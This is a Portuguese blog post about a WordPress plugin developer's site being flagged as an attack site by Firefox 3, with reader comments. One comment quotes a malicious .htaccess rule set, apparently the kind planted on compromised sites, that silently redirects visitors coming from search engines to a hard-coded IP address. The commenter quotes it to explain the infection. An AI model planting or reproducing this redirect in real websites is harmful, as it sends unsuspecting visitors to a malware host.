Site denunciado como foco de ataques!


Hoje, como um dia qualquer, estava eu buscando plugins novos para o WordPress. Achei um tal de Post Thumb Revisited, que promete exibir miniaturas para o post ou para a sidebar.

Logo pensei: Vou baixar esse e testar localmente, se for bom, posso usar em algum blog.
Mas antes do download, gosto sempre de dar uma olhada no site do desenvolvedor, só que desta vez (pela primeira no Firefox 3), fui alertado que o site http://www.alakhnor.com/post-thumb está na lista negra de foco de ataques*. Mas ele está lá, no WordPress, e a comunidade já procura uma explicação ou gente para continuar mantendo o plugin.

Preferi deixar bloqueado e não conhecer este plugin. Melhor prevenir, que remediar! :)

* “Focos de ataques são sites que tentam instalar programas que roubam informações pessoais, usam o seu computador para atacar outros ou danificam o seu sistema.

Alguns destes sites intencionalmente distribuem software nocivo, mas muitos são comprometidos sem o conhecimento ou permissão de seus responsáveis.”

Será que você tem algo a dizer sobre este post? Porque não deixa um comentário e continuar a conversa, ou assinar o nosso feed e receber nossos artigos em seu leitor de feed/RSS.

Comentários

O site que vc comenta não está infectado, o problema acontece com blogs de grande audiência onde um código malicioso te leva para outro site.

è um codigo tipo esse no arquivo .htaccess

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.205/in.html?s=xx [R,L]

Então fique tranquilo sobre o site em qquestão que não está com vírus e sim o site que o código leva…

Beleza, Jardel.
Valeu pela dica!

[]s

MEU SITE ESTÁ COM ESSE AVISO ( SITE DENUNCIADO COM FOCO DE ATAQUE ) NAÕ SEI O QUE FAÇO TODA VEZ QUE ACESSO MEU SITE, VEM ESSE AVISO. ALGUÉM PODE ME AJUDAR DE COMO POSSO FICAR LIVRE DESSA TREVA! POR FAVOR.

AGUARDO RESPOSTA:

Deixe um comentário

(obrigatório)

(obrigatório)